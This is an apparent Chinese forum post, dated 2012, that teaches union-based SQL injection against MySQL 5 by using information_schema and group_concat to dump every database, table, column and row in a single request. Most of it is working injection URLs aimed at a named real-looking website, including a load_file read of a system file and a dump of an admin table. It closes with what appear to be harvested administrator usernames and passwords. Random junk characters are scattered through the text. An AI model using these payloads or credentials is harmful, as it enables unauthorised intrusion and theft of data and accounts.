此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
3 V+ t$ ^% w ]# K但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
) O' s/ y L+ _7 a# V* j
% K9 J; H) b+ _: w' Z1 C: @4 s
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入2 ~4 O, {( f* z
* x0 F) h$ F% W6 c! G
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
0 H0 e& m4 ?: k0 Z# b( y3 j! K. q& C8 C# w2 b1 `4 I0 u$ [
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示 y3 @/ d7 z3 g
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等( d8 l$ B: y) m3 a; J U% i
* x3 \ \$ `0 Y. e. yhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
/ f. R# J+ j' I+ X% ~
* |& }; u0 p8 ^8 s" T- w读出所有库:! u# u; `8 ~7 P( e2 ^& M# L) p
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
$ s7 M t. K1 V9 F6 [. R8 f6 r+ P4 r" Y+ j. i" N
, |3 U3 @5 |/ z0 |/ X$ l
# K/ G* y! Q# U: J5 W读出所有表:* |9 R0 X% L0 ]- a
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
7 Q: [- A. v4 D: u# S. v" I0 I- l
$ u ~) m) J2 f. G- t6 h读出所有表字段:9 g9 C) b; A$ ^3 ]
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
- ]+ ~2 A( P+ y X/ g+ Q" Y8 ~3 l7 a*/ (97,100,109,105,110)为admin的ascii码 依次类推
0 z* D* O, C3 F7 q$ R1 n/ F
. I, |4 ]- S8 C: S读出所有表字段里的内容:2 l& S. M* T, S( R
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin# A ^4 X3 }" H3 b& G& g
7 J; N0 c0 }9 [0 r. i2 H, X
, E, o/ \( s' J1 t8 @6 V; `6 Y4 k
8 A) }# t) F" r+ r
# z; k6 z7 q& G0 a2 i0 i2 a% a- W+ }( J+ z4 }! u( N
# T3 d5 x- ` e: }. Ihttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23, ^5 Q4 `, q# k% Z! x
7 x' I5 l+ B1 g* _
' h0 T3 f2 v' |0 ~" C6 k% n5 Y
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
& W7 e% q( @/ y$ Y& T* _8 Q2 ^( I- D: K! b2 z6 y
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23! d+ H7 ^# k3 c+ s1 s. ?1 U1 K
) B4 y% N# Z7 s" H/ H- e8 B1 ?. D. l" h& V7 R% f" H
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%236 C9 b& i( {2 D' Q; \9 S5 C/ H
( n6 u* `8 v' f9 {) Z. p! D
# X1 b' n; l3 m- s5 q+ Q/ L webmaster:dzb521123,simlab:simadmin20043233
& L2 c& S3 R- [9 a! k" P U0 Y) g |
发表于 2012-9-13 16:37:34
收藏
支持
反对